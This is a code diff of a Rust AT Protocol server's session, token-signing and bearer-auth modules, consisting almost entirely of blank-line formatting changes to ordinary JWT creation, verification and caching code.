src/api/server/session.rs
··· 12 12 use serde::{Deserialize, Serialize}; 13 13 use serde_json::json; 14 14 use tracing::{error, info, warn}; 15 + 15 16 fn extract_client_ip(headers: &HeaderMap) -> String { 16 17 if let Some(forwarded) = headers.get("x-forwarded-for") { 17 18 if let Ok(value) = forwarded.to_str() { ··· 27 28 } 28 29 "unknown".to_string() 29 30 } 31 + 30 32 #[derive(Deserialize)] 31 33 pub struct CreateSessionInput { 32 34 pub identifier: String, 33 35 pub password: String, 34 36 } 37 + 35 38 #[derive(Serialize)] 36 39 #[serde(rename_all = "camelCase")] 37 40 pub struct CreateSessionOutput { ··· 40 43 pub handle: String, 41 44 pub did: String, 42 45 } 46 + 43 47 pub async fn create_session( 44 48 State(state): State<AppState>, 45 49 headers: HeaderMap, ··· 155 159 did: row.did, 156 160 }).into_response() 157 161 } 162 + 158 163 pub async fn get_session( 159 164 State(state): State<AppState>, 160 165 BearerAuth(auth_user): BearerAuth, ··· 194 199 } 195 200 } 196 201 } 202 + 197 203 pub async fn delete_session( 198 204 State(state): State<AppState>, 199 205 headers: axum::http::HeaderMap, ··· 227 233 } 228 234 } 229 235 } 236 + 230 237 pub async fn refresh_session( 231 238 State(state): State<AppState>, 232 239 headers: axum::http::HeaderMap, ··· 395 402 } 396 403 } 397 404 } 405 + 398 406 #[derive(Deserialize)] 399 407 #[serde(rename_all = "camelCase")] 400 408 pub struct ConfirmSignupInput { 401 409 pub did: String, 402 410 pub verification_code: String, 403 411 } 412 + 404 413 #[derive(Serialize)] 405 414 #[serde(rename_all = "camelCase")] 406 415 pub struct ConfirmSignupOutput { ··· 413 422 pub preferred_channel: String, 414 423 pub preferred_channel_verified: bool, 415 424 } 425 + 416 426 pub async fn confirm_signup( 417 427 State(state): State<AppState>, 418 428 Json(input): Json<ConfirmSignupInput>, ··· 535 545 preferred_channel_verified: true, 536 546 }).into_response() 537 547 } 548 + 538 549 #[derive(Deserialize)] 539 550 #[serde(rename_all = "camelCase")] 540 551 pub struct ResendVerificationInput { 541 552 pub did: String, 542 553 } 554 + 543 555 pub async fn resend_verification( 544 556 State(state): State<AppState>, 545 557 Json(input): Json<ResendVerificationInput>,
+5
src/api/server/signing_key.rs
··· 10 10 use serde::{Deserialize, Serialize}; 11 11 use serde_json::json; 12 12 use tracing::{error, info}; 13 + 13 14 const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01]; 15 + 14 16 fn public_key_to_did_key(signing_key: &SigningKey) -> String { 15 17 let verifying_key = signing_key.verifying_key(); 16 18 let compressed_pubkey = verifying_key.to_sec1_bytes(); ··· 20 22 let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key); 21 23 format!("did:key:{}", encoded) 22 24 } 25 + 23 26 #[derive(Deserialize)] 24 27 pub struct ReserveSigningKeyInput { 25 28 pub did: Option<String>, 26 29 } 30 + 27 31 #[derive(Serialize)] 28 32 #[serde(rename_all = "camelCase")] 29 33 pub struct ReserveSigningKeyOutput { 30 34 pub signing_key: String, 31 35 } 36 + 32 37 pub async fn reserve_signing_key( 33 38 State(state): State<AppState>, 34 39 Json(input): Json<ReserveSigningKeyInput>,
+2
src/api/temp.rs
··· 8 8 use serde_json::json; 9 9 use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 10 10 use crate::state::AppState; 11 + 11 12 #[derive(Serialize)] 12 13 #[serde(rename_all = "camelCase")] 13 14 pub struct CheckSignupQueueOutput { ··· 17 18 #[serde(skip_serializing_if = "Option::is_none")] 18 19 pub estimated_time_ms: Option<i64>, 19 20 } 21 + 20 22 pub async fn check_signup_queue( 21 23 State(state): State<AppState>, 22 24 headers: HeaderMap,
+2
src/api/validation.rs
··· 3 3 pub const MAX_DOMAIN_LENGTH: usize = 253; 4 4 pub const MAX_DOMAIN_LABEL_LENGTH: usize = 63; 5 5 const EMAIL_LOCAL_SPECIAL_CHARS: &str = ".!#$%&'*+/=?^_`{|}~-"; 6 + 6 7 pub fn is_valid_email(email: &str) -> bool { 7 8 let email = email.trim(); 8 9 if email.is_empty() || email.len() > MAX_EMAIL_LENGTH { ··· 49 50 } 50 51 true 51 52 } 53 + 52 54 #[cfg(test)] 53 55 mod tests { 54 56 use super::*;
+27
src/auth/extractor.rs
··· 5 5 Json, 6 6 }; 7 7 use serde_json::json; 8 + 8 9 use crate::state::AppState; 9 10 use super::{AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, validate_bearer_token_cached_allow_deactivated}; 11 + 10 12 pub struct BearerAuth(pub AuthenticatedUser); 13 + 11 14 #[derive(Debug)] 12 15 pub enum AuthError { 13 16 MissingToken, ··· 16 19 AccountDeactivated, 17 20 AccountTakedown, 18 21 } 22 + 19 23 impl IntoResponse for AuthError { 20 24 fn into_response(self) -> Response { 21 25 let (status, error, message) = match self { ··· 45 49 "Account has been taken down", 46 50 ), 47 51 }; 52 + 48 53 (status, Json(json!({ "error": error, "message": message }))).into_response() 49 54 } 50 55 } 56 + 51 57 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 52 58 let auth_header = auth_header.trim(); 59 + 53 60 if auth_header.len() < 8 { 54 61 return Err(AuthError::InvalidFormat); 55 62 } 63 + 56 64 let prefix = &auth_header[..7]; 57 65 if !prefix.eq_ignore_ascii_case("bearer ") { 58 66 return Err(AuthError::InvalidFormat); 59 67 } 68 + 60 69 let token = auth_header[7..].trim(); 61 70 if token.is_empty() { 62 71 return Err(AuthError::InvalidFormat); 63 72 } 73 + 64 74 Ok(token) 65 75 } 76 + 66 77 pub fn extract_bearer_token_from_header(auth_header: Option<&str>) -> Option<String> { 67 78 let header = auth_header?; 68 79 let header = header.trim(); 80 + 69 81 if header.len() < 7 { 70 82 return None; 71 83 } 84 + 72 85 if !header[..7].eq_ignore_ascii_case("bearer ") { 73 86 return None; 74 87 } 88 + 75 89 let token = header[7..].trim(); 76 90 if token.is_empty() { 77 91 return None; 78 92 } 93 + 79 94 Some(token.to_string()) 80 95 } 96 + 81 97 impl FromRequestParts<AppState> for BearerAuth { 82 98 type Rejection = AuthError; 99 + 83 100 async fn from_request_parts( 84 101 parts: &mut Parts, 85 102 state: &AppState, ··· 90 107 .ok_or(AuthError::MissingToken)? 91 108 .to_str() 92 109 .map_err(|_| AuthError::InvalidFormat)?; 110 + 93 111 let token = extract_bearer_token(auth_header)?; 112 + 94 113 match validate_bearer_token_cached(&state.db, &state.cache, token).await { 95 114 Ok(user) => Ok(BearerAuth(user)), 96 115 Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), ··· 99 118 } 100 119 } 101 120 } 121 + 102 122 pub struct BearerAuthAllowDeactivated(pub AuthenticatedUser); 123 + 103 124 impl FromRequestParts<AppState> for BearerAuthAllowDeactivated { 104 125 type Rejection = AuthError; 126 + 105 127 async fn from_request_parts( 106 128 parts: &mut Parts, 107 129 state: &AppState, ··· 112 134 .ok_or(AuthError::MissingToken)? 113 135 .to_str() 114 136 .map_err(|_| AuthError::InvalidFormat)?; 137 + 115 138 let token = extract_bearer_token(auth_header)?; 139 + 116 140 match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await { 117 141 Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 118 142 Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), ··· 120 144 } 121 145 } 122 146 } 147 + 123 148 #[cfg(test)] 124 149 mod tests { 125 150 use super::*; 151 + 126 152 #[test] 127 153 fn test_extract_bearer_token() { 128 154 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); ··· 130 156 assert_eq!(extract_bearer_token("BEARER abc123").unwrap(), "abc123"); 131 157 assert_eq!(extract_bearer_token("Bearer abc123").unwrap(), "abc123"); 132 158 assert_eq!(extract_bearer_token(" Bearer abc123 ").unwrap(), "abc123"); 159 + 133 160 assert!(extract_bearer_token("Basic abc123").is_err()); 134 161 assert!(extract_bearer_token("Bearer").is_err()); 135 162 assert!(extract_bearer_token("Bearer ").is_err());
+35 -1
src/auth/mod.rs
··· 3 3 use std::fmt; 4 4 use std::sync::Arc; 5 5 use std::time::Duration; 6 + 6 7 use crate::cache::Cache; 8 + 7 9 pub mod extractor; 8 10 pub mod token; 9 11 pub mod verify; 12 + 10 13 pub use extractor::{BearerAuth, BearerAuthAllowDeactivated, AuthError, extract_bearer_token_from_header}; 11 14 pub use token::{ 12 15 create_access_token, create_refresh_token, create_service_token, ··· 16 19 SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, 17 20 }; 18 21 pub use verify::{get_did_from_token, get_jti_from_token, verify_token, verify_access_token, verify_refresh_token}; 22 + 19 23 const KEY_CACHE_TTL_SECS: u64 = 300; 20 24 const SESSION_CACHE_TTL_SECS: u64 = 60; 25 + 21 26 #[derive(Debug, Clone, Copy, PartialEq, Eq)] 22 27 pub enum TokenValidationError { 23 28 AccountDeactivated, ··· 25 30 KeyDecryptionFailed, 26 31 AuthenticationFailed, 27 32 } 33 + 28 34 impl fmt::Display for TokenValidationError { 29 35 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { 30 36 match self { ··· 35 41 } 36 42 } 37 43 } 44 + 38 45 pub struct AuthenticatedUser { 39 46 pub did: String, 40 47 pub key_bytes: Option<Vec<u8>>, 41 48 pub is_oauth: bool, 42 49 } 50 + 43 51 pub async fn validate_bearer_token( 44 52 db: &PgPool, 45 53 token: &str, 46 54 ) -> Result<AuthenticatedUser, TokenValidationError> { 47 55 validate_bearer_token_with_options_internal(db, None, token, false).await 48 56 } 57 + 49 58 pub async fn validate_bearer_token_allow_deactivated( 50 59 db: &PgPool, 51 60 token: &str, 52 61 ) -> Result<AuthenticatedUser, TokenValidationError> { 53 62 validate_bearer_token_with_options_internal(db, None, token, true).await 54 63 } 64 + 55 65 pub async fn validate_bearer_token_cached( 56 66 db: &PgPool, 57 67 cache: &Arc<dyn Cache>, ··· 59 69 ) -> Result<AuthenticatedUser, TokenValidationError> { 60 70 validate_bearer_token_with_options_internal(db, Some(cache), token, false).await 61 71 } 72 + 62 73 pub async fn validate_bearer_token_cached_allow_deactivated( 63 74 db: &PgPool, 64 75 cache: &Arc<dyn Cache>, ··· 66 77 ) -> Result<AuthenticatedUser, TokenValidationError> { 67 78 validate_bearer_token_with_options_internal(db, Some(cache), token, true).await 68 79 } 80 + 69 81 async fn validate_bearer_token_with_options_internal( 70 82 db: &PgPool, 71 83 cache: Option<&Arc<dyn Cache>>, ··· 73 85 allow_deactivated: bool, 74 86 ) -> Result<AuthenticatedUser, TokenValidationError> { 75 87 let did_from_token = get_did_from_token(token).ok(); 88 + 76 89 if let Some(ref did) = did_from_token { 77 90 let key_cache_key = format!("auth:key:{}", did); 78 91 let mut cached_key: Option<Vec<u8>> = None; 92 + 79 93 if let Some(c) = cache { 80 94 cached_key = c.get_bytes(&key_cache_key).await; 81 95 if cached_key.is_some() { ··· 84 98 crate::metrics::record_auth_cache_miss("key"); 85 99 } 86 100 } 101 + 87 102 let (decrypted_key, deactivated_at, takedown_ref) = if let Some(key) = cached_key { 88 103 let user_status = sqlx::query!( 89 104 "SELECT deactivated_at, takedown_ref FROM users WHERE did = $1", ··· 93 108 .await 94 109 .ok() 95 110 .flatten(); 111 + 96 112 match user_status { 97 113 Some(status) => (Some(key), status.deactivated_at, status.takedown_ref), 98 114 None => (None, None, None), ··· 112 128 { 113 129 let key = crate::config::decrypt_key(&user.key_bytes, user.encryption_version) 114 130 .map_err(|_| TokenValidationError::KeyDecryptionFailed)?; 131 + 115 132 if let Some(c) = cache { 116 133 let _ = c.set_bytes(&key_cache_key, &key, Duration::from_secs(KEY_CACHE_TTL_SECS)).await; 117 134 } 135 + 118 136 (Some(key), user.deactivated_at, user.takedown_ref) 119 137 } else { 120 138 (None, None, None) 121 139 } 122 140 }; 141 + 123 142 if let Some(decrypted_key) = decrypted_key { 124 143 if !allow_deactivated && deactivated_at.is_some() { 125 144 return Err(TokenValidationError::AccountDeactivated); 126 145 } 146 + 127 147 if takedown_ref.is_some() { 128 148 return Err(TokenValidationError::AccountTakedown); 129 149 } 150 + 130 151 if let Ok(token_data) = verify_access_token(token, &decrypted_key) { 131 152 let jti = &token_data.claims.jti; 132 153 let session_cache_key = format!("auth:session:{}:{}", did, jti); 133 154 let mut session_valid = false; 155 + 134 156 if let Some(c) = cache { 135 157 if let Some(cached_value) = c.get(&session_cache_key).await { 136 158 session_valid = cached_value == "1"; ··· 139 161 crate::metrics::record_auth_cache_miss("session"); 140 162 } 141 163 } 164 + 142 165 if !session_valid { 143 166 let session_exists = sqlx::query_scalar!( 144 167 "SELECT 1 as one FROM session_tokens WHERE did = $1 AND access_jti = $2 AND access_expires_at > NOW()", ··· 149 172 .await 150 173 .ok() 151 174 .flatten(); 175 + 152 176 session_valid = session_exists.is_some(); 177 + 153 178 if session_valid { 154 179 if let Some(c) = cache { 155 180 let _ = c.set(&session_cache_key, "1", Duration::from_secs(SESSION_CACHE_TTL_SECS)).await; 156 181 } 157 182 } 158 183 } 184 + 159 185 if session_valid { 160 186 return Ok(AuthenticatedUser { 161 187 did: did.clone(), ··· 166 192 } 167 193 } 168 194 } 195 + 169 196 if let Ok(oauth_info) = crate::oauth::verify::extract_oauth_token_info(token) { 170 197 if let Some(oauth_token) = sqlx::query!( 171 198 r#"SELECT t.did, t.expires_at, u.deactivated_at, u.takedown_ref ··· 182 209 if !allow_deactivated && oauth_token.deactivated_at.is_some() { 183 210 return Err(TokenValidationError::AccountDeactivated); 184 211 } 212 + 185 213 if oauth_token.takedown_ref.is_some() { 186 214 return Err(TokenValidationError::AccountTakedown); 187 215 } 216 + 188 217 let now = chrono::Utc::now(); 189 218 if oauth_token.expires_at > now { 190 219 return Ok(AuthenticatedUser { ··· 195 224 } 196 225 } 197 226 } 227 + 198 228 Err(TokenValidationError::AuthenticationFailed) 199 229 } 230 + 200 231 pub async fn invalidate_auth_cache(cache: &Arc<dyn Cache>, did: &str) { 201 232 let key_cache_key = format!("auth:key:{}", did); 202 233 let _ = cache.delete(&key_cache_key).await; 203 234 } 235 + 204 236 #[derive(Debug, Serialize, Deserialize)] 205 237 pub struct Claims { 206 238 pub iss: String, ··· 214 246 pub lxm: Option<String>, 215 247 pub jti: String, 216 248 } 249 + 217 250 #[derive(Debug, Serialize, Deserialize)] 218 251 pub struct Header { 219 252 pub alg: String, 220 253 pub typ: String, 221 254 } 255 + 222 256 #[derive(Debug, Serialize, Deserialize)] 223 257 pub struct UnsafeClaims { 224 258 pub iss: String, 225 259 pub sub: Option<String>, 226 260 } 227 - // fancy boy TokenData equivalent for compatibility/structure 261 + 228 262 pub struct TokenData<T> { 229 263 pub claims: T, 230 264 }
+42
src/auth/token.rs
··· 7 7 use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 8 8 use sha2::Sha256; 9 9 use uuid; 10 + 10 11 type HmacSha256 = Hmac<Sha256>; 12 + 11 13 pub const TOKEN_TYPE_ACCESS: &str = "at+jwt"; 12 14 pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt"; 13 15 pub const TOKEN_TYPE_SERVICE: &str = "jwt"; ··· 15 17 pub const SCOPE_REFRESH: &str = "com.atproto.refresh"; 16 18 pub const SCOPE_APP_PASS: &str = "com.atproto.appPass"; 17 19 pub const SCOPE_APP_PASS_PRIVILEGED: &str = "com.atproto.appPassPrivileged"; 20 + 18 21 pub struct TokenWithMetadata { 19 22 pub token: String, 20 23 pub jti: String, 21 24 pub expires_at: DateTime<Utc>, 22 25 } 26 + 23 27 pub fn create_access_token(did: &str, key_bytes: &[u8]) -> Result<String> { 24 28 Ok(create_access_token_with_metadata(did, key_bytes)?.token) 25 29 } 30 + 26 31 pub fn create_refresh_token(did: &str, key_bytes: &[u8]) -> Result<String> { 27 32 Ok(create_refresh_token_with_metadata(did, key_bytes)?.token) 28 33 } 34 + 29 35 pub fn create_access_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 30 36 create_signed_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, key_bytes, Duration::minutes(120)) 31 37 } 38 + 32 39 pub fn create_refresh_token_with_metadata(did: &str, key_bytes: &[u8]) -> Result<TokenWithMetadata> { 33 40 create_signed_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, key_bytes, Duration::days(90)) 34 41 } 42 + 35 43 pub fn create_service_token(did: &str, aud: &str, lxm: &str, key_bytes: &[u8]) -> Result<String> { 36 44 let signing_key = SigningKey::from_slice(key_bytes)?; 45 + 37 46 let expiration = Utc::now() 38 47 .checked_add_signed(Duration::seconds(60)) 39 48 .expect("valid timestamp") 40 49 .timestamp(); 50 + 41 51 let claims = Claims { 42 52 iss: did.to_owned(), 43 53 sub: did.to_owned(), ··· 48 58 lxm: Some(lxm.to_string()), 49 59 jti: uuid::Uuid::new_v4().to_string(), 50 60 }; 61 + 51 62 sign_claims(claims, &signing_key) 52 63 } 64 + 53 65 fn create_signed_token_with_metadata( 54 66 did: &str, 55 67 scope: &str, ··· 58 70 duration: Duration, 59 71 ) -> Result<TokenWithMetadata> { 60 72 let signing_key = SigningKey::from_slice(key_bytes)?; 73 + 61 74 let expires_at = Utc::now() 62 75 .checked_add_signed(duration) 63 76 .expect("valid timestamp"); 77 + 64 78 let expiration = expires_at.timestamp(); 65 79 let jti = uuid::Uuid::new_v4().to_string(); 80 + 66 81 let claims = Claims { 67 82 iss: did.to_owned(), 68 83 sub: did.to_owned(), ··· 76 91 lxm: None, 77 92 jti: jti.clone(), 78 93 }; 94 + 79 95 let token = sign_claims_with_type(claims, &signing_key, typ)?; 96 + 80 97 Ok(TokenWithMetadata { 81 98 token, 82 99 jti, 83 100 expires_at, 84 101 }) 85 102 } 103 + 86 104 fn sign_claims(claims: Claims, key: &SigningKey) -> Result<String> { 87 105 sign_claims_with_type(claims, key, TOKEN_TYPE_SERVICE) 88 106 } 107 + 89 108 fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<String> { 90 109 let header = Header { 91 110 alg: "ES256K".to_string(), 92 111 typ: typ.to_string(), 93 112 }; 113 + 94 114 let header_json = serde_json::to_string(&header)?; 95 115 let claims_json = serde_json::to_string(&claims)?; 116 + 96 117 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 97 118 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 119 + 98 120 let message = format!("{}.{}", header_b64, claims_b64); 99 121 let signature: Signature = key.sign(message.as_bytes()); 100 122 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 123 + 101 124 Ok(format!("{}.{}", message, signature_b64)) 102 125 } 126 + 103 127 pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 104 128 Ok(create_access_token_hs256_with_metadata(did, secret)?.token) 105 129 } 130 + 106 131 pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 107 132 Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token) 108 133 } 134 + 109 135 pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 110 136 create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120)) 111 137 } 138 + 112 139 pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 113 140 create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90)) 114 141 } 142 + 115 143 pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> { 116 144 let expiration = Utc::now() 117 145 .checked_add_signed(Duration::seconds(60)) 118 146 .expect("valid timestamp") 119 147 .timestamp(); 148 + 120 149 let claims = Claims { 121 150 iss: did.to_owned(), 122 151 sub: did.to_owned(), ··· 127 156 lxm: Some(lxm.to_string()), 128 157 jti: uuid::Uuid::new_v4().to_string(), 129 158 }; 159 + 130 160 sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret) 131 161 } 162 + 132 163 fn create_hs256_token_with_metadata( 133 164 did: &str, 134 165 scope: &str, ··· 139 170 let expires_at = Utc::now() 140 171 .checked_add_signed(duration) 141 172 .expect("valid timestamp"); 173 + 142 174 let expiration = expires_at.timestamp(); 143 175 let jti = uuid::Uuid::new_v4().to_string(); 176 + 144 177 let claims = Claims { 145 178 iss: did.to_owned(), 146 179 sub: did.to_owned(), ··· 154 187 lxm: None, 155 188 jti: jti.clone(), 156 189 }; 190 + 157 191 let token = sign_claims_hs256(claims, typ, secret)?; 192 + 158 193 Ok(TokenWithMetadata { 159 194 token, 160 195 jti, 161 196 expires_at, 162 197 }) 163 198 } 199 + 164 200 fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> { 165 201 let header = Header { 166 202 alg: "HS256".to_string(), 167 203 typ: typ.to_string(), 168 204 }; 205 + 169 206 let header_json = serde_json::to_string(&header)?; 170 207 let claims_json = serde_json::to_string(&claims)?; 208 + 171 209 let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 172 210 let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 211 + 173 212 let message = format!("{}.{}", header_b64, claims_b64); 213 + 174 214 let mut mac = HmacSha256::new_from_slice(secret) 175 215 .map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?; 176 216 mac.update(message.as_bytes()); 217 + 177 218 let signature = mac.finalize().into_bytes(); 178 219 let signature_b64 = URL_SAFE_NO_PAD.encode(signature); 220 + 179 221 Ok(format!("{}.{}", message, signature_b64)) 180 222 }
+48
src/auth/verify.rs
··· 8 8 use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier}; 9 9 use sha2::Sha256; 10 10 use subtle::ConstantTimeEq; 11 + 11 12 type HmacSha256 = Hmac<Sha256>; 13 + 12 14 pub fn get_did_from_token(token: &str) -> Result<String, String> { 13 15 let parts: Vec<&str> = token.split('.').collect(); 14 16 if parts.len() != 3 { 15 17 return Err("Invalid token format".to_string()); 16 18 } 19 + 17 20 let payload_bytes = URL_SAFE_NO_PAD 18 21 .decode(parts[1]) 19 22 .map_err(|e| format!("Base64 decode failed: {}", e))?; 23 + 20 24 let claims: UnsafeClaims = 21 25 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 26 + 22 27 Ok(claims.sub.unwrap_or(claims.iss)) 23 28 } 29 + 24 30 pub fn get_jti_from_token(token: &str) -> Result<String, String> { 25 31 let parts: Vec<&str> = token.split('.').collect(); 26 32 if parts.len() != 3 { 27 33 return Err("Invalid token format".to_string()); 28 34 } 35 + 29 36 let payload_bytes = URL_SAFE_NO_PAD 30 37 .decode(parts[1]) 31 38 .map_err(|e| format!("Base64 decode failed: {}", e))?; 39 + 32 40 let claims: serde_json::Value = 33 41 serde_json::from_slice(&payload_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 42 + 34 43 claims.get("jti") 35 44 .and_then(|j| j.as_str()) 36 45 .map(|s| s.to_string()) 37 46 .ok_or_else(|| "No jti claim in token".to_string()) 38 47 } 48 + 39 49 pub fn verify_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 40 50 verify_token_internal(token, key_bytes, None, None) 41 51 } 52 + 42 53 pub fn verify_access_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 43 54 verify_token_internal( 44 55 token, ··· 47 58 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 48 59 ) 49 60 } 61 + 50 62 pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<Claims>> { 51 63 verify_token_internal( 52 64 token, ··· 55 67 Some(&[SCOPE_REFRESH]), 56 68 ) 57 69 } 70 + 58 71 pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 59 72 verify_token_hs256_internal( 60 73 token, ··· 63 76 Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 64 77 ) 65 78 } 79 + 66 80 pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 67 81 verify_token_hs256_internal( 68 82 token, ··· 71 85 Some(&[SCOPE_REFRESH]), 72 86 ) 73 87 } 88 + 74 89 fn verify_token_internal( 75 90 token: &str, 76 91 key_bytes: &[u8], ··· 81 96 if parts.len() != 3 { 82 97 return Err(anyhow!("Invalid token format")); 83 98 } 99 + 84 100 let header_b64 = parts[0]; 85 101 let claims_b64 = parts[1]; 86 102 let signature_b64 = parts[2]; 103 + 87 104 let header_bytes = URL_SAFE_NO_PAD 88 105 .decode(header_b64) 89 106 .context("Base64 decode of header failed")?; 107 + 90 108 let header: Header = 91 109 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 110 + 92 111 if let Some(expected) = expected_typ { 93 112 if header.typ != expected { 94 113 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 95 114 } 96 115 } 116 + 97 117 let signature_bytes = URL_SAFE_NO_PAD 98 118 .decode(signature_b64) 99 119 .context("Base64 decode of signature failed")?; 120 + 100 121 let signature = Signature::from_slice(&signature_bytes) 101 122 .map_err(|e| anyhow!("Invalid signature format: {}", e))?; 123 + 102 124 let signing_key = SigningKey::from_slice(key_bytes)?; 103 125 let verifying_key = VerifyingKey::from(&signing_key); 126 + 104 127 let message = format!("{}.{}", header_b64, claims_b64); 105 128 verifying_key 106 129 .verify(message.as_bytes(), &signature) 107 130 .map_err(|e| anyhow!("Signature verification failed: {}", e))?; 131 + 108 132 let claims_bytes = URL_SAFE_NO_PAD 109 133 .decode(claims_b64) 110 134 .context("Base64 decode of claims failed")?; 135 + 111 136 let claims: Claims = 112 137 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 138 + 113 139 let now = Utc::now().timestamp() as usize; 114 140 if claims.exp < now { 115 141 return Err(anyhow!("Token expired")); 116 142 } 143 + 117 144 if let Some(scopes) = allowed_scopes { 118 145 let token_scope = claims.scope.as_deref().unwrap_or(""); 119 146 if !scopes.contains(&token_scope) { 120 147 return Err(anyhow!("Invalid token scope: {}", token_scope)); 121 148 } 122 149 } 150 + 123 151 Ok(TokenData { claims }) 124 152 } 153 + 125 154 fn verify_token_hs256_internal( 126 155 token: &str, 127 156 secret: &[u8], ··· 132 161 if parts.len() != 3 { 133 162 return Err(anyhow!("Invalid token format")); 134 163 } 164 + 135 165 let header_b64 = parts[0]; 136 166 let claims_b64 = parts[1]; 137 167 let signature_b64 = parts[2]; 168 + 138 169 let header_bytes = URL_SAFE_NO_PAD 139 170 .decode(header_b64) 140 171 .context("Base64 decode of header failed")?; 172 + 141 173 let header: Header = 142 174 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 175 + 143 176 if header.alg != "HS256" { 144 177 return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg)); 145 178 } 179 + 146 180 if let Some(expected) = expected_typ { 147 181 if header.typ != expected { 148 182 return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 149 183 } 150 184 } 185 + 151 186 let signature_bytes = URL_SAFE_NO_PAD 152 187 .decode(signature_b64) 153 188 .context("Base64 decode of signature failed")?; 189 + 154 190 let message = format!("{}.{}", header_b64, claims_b64); 191 + 155 192 let mut mac = HmacSha256::new_from_slice(secret) 156 193 .map_err(|e| anyhow!("Invalid secret: {}", e))?; 157 194 mac.update(message.as_bytes()); 195 + 158 196 let expected_signature = mac.finalize().into_bytes(); 159 197 let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into(); 198 + 160 199 if !is_valid { 161 200 return Err(anyhow!("Signature verification failed")); 162 201 } 202 + 163 203 let claims_bytes = URL_SAFE_NO_PAD 164 204 .decode(claims_b64) 165 205 .context("Base64 decode of claims failed")?; 206 + 166 207 let claims: Claims = 167 208 serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 209 + 168 210 let now = Utc::now().timestamp() as usize; 169 211 if claims.exp < now { 170 212 return Err(anyhow!("Token expired")); 171 213 } 214 + 172 215 if let Some(scopes) = allowed_scopes { 173 216 let token_scope = claims.scope.as_deref().unwrap_or(""); 174 217 if !scopes.contains(&token_scope) { 175 218 return Err(anyhow!("Invalid token scope: {}", token_scope)); 176 219 } 177 220 } 221 + 178 222 Ok(TokenData { claims }) 179 223 } 224 + 180 225 pub fn get_algorithm_from_token(token: &str) -> Result<String, String> { 181 226 let parts: Vec<&str> = token.split('.').collect(); 182 227 if parts.len() != 3 { 183 228 return Err("Invalid token format".to_string()); 184 229 } 230 + 185 231 let header_bytes = URL_SAFE_NO_PAD 186 232 .decode(parts[0]) 187 233 .map_err(|e| format!("Base64 decode failed: {}", e))?; 234 + 188 235 let header: Header = 189 236 serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 237 + 190 238 Ok(header.alg) 191 239 }
+24
src/cache/mod.rs
